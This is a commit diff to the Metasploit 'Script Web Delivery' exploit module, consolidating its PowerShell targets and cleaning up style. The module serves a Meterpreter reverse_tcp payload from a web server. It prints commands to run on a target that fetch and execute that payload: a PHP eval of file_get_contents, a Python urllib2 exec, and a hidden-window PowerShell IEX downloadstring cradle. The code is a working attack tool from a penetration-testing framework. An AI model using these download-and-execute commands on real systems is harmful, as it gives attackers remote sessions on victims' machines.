Land rapid7#3597, script/web_delivery powershell fixes

Author: Meatballs1

modules/exploits/multi/script/web_delivery.rb

@@ -4,16 +4,18 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/powershell'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ManualRanking
 
+  include Msf::Exploit::Powershell
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
     super(update_info(info,
       'Name'         => 'Script Web Delivery',
-      'Description'  => %q{
+      'Description'  => %q(
         This module quickly fires up a web server that serves a payload.
         The provided command will start the specified scripting language interpreter and then download and execute the
         payload. The main purpose of this module is to quickly establish a session on a target
@@ -23,26 +25,26 @@ def initialize(info = {})
         escalations supplied by Meterpreter. When using either of the PSH targets, ensure the
         payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute
         x86 payloads on x64 machines.
-      },
+      ),
       'License'      => MSF_LICENSE,
       'Author'       =>
         [
           'Andrew Smith "jakx" <[email protected]>',
           'Ben Campbell',
-          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
+          'Chris Campbell' # @obscuresec - Inspiration n.b. no relation!
         ],
       'DefaultOptions' =>
         {
           'Payload'    => 'python/meterpreter/reverse_tcp'
         },
       'References'     =>
         [
-          [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
-          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
-          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
-          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+          ['URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html'],
+          ['URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/'],
+          ['URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          ['URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
         ],
-      'Platform'       => %w{python php win},
+      'Platform'       => %w(python php win),
       'Targets'        =>
         [
           ['Python', {
@@ -53,45 +55,45 @@ def initialize(info = {})
             'Platform' => 'php',
             'Arch' => ARCH_PHP
           }],
-          ['PSH_x86', {
+          ['PSH', {
             'Platform' => 'win',
-            'Arch' => ARCH_X86
-          }],
-          ['PSH_x64', {
-            'Platform' => 'win',
-            'Arch' => ARCH_X86_64
-          }],
+            'Arch' => [ARCH_X86, ARCH_X86_64]
+          }]
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Jul 19 2013'
     ))
   end
 
-  def on_request_uri(cli, request)
-    print_status("Delivering Payload")
-    if (target.name.include? "PSH")
-      data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+  def on_request_uri(cli, _request)
+    print_status('Delivering Payload')
+    if target.name.include? 'PSH'
+      data = cmd_psh_payload(payload.encoded,
+                             payload_instance.arch.first,
+                             remove_comspec: true,
+                             use_single_quotes: true
+                           )
     else
-      data = %Q|#{payload.encoded} |
+      data = %Q(#{payload.encoded} )
     end
-    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+    send_response(cli, data,  'Content-Type' => 'application/octet-stream')
   end
 
   def primer
-    url = get_uri()
-    print_status("Run the following command on the target machine:")
+    url = get_uri
+    print_status('Run the following command on the target machine:')
     case target.name
-    when "PHP"
+    when 'PHP'
       print_line("php -d allow_url_fopen=true -r \"eval(file_get_contents('#{url}'));\"")
-    when "Python"
+    when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
-    when "PSH_x86", "PSH_x64"
+    when 'PSH'
       download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
-      print_line generate_psh_command_line({
-                                     :noprofile => true,
-                                     :windowstyle => 'hidden',
-                                     :command => download_and_run
-                                 })
+      print_line generate_psh_command_line(
+                                             noprofile: true,
+                                             windowstyle: 'hidden',
+                                             command: download_and_run
+                                           )
     end
   end
 end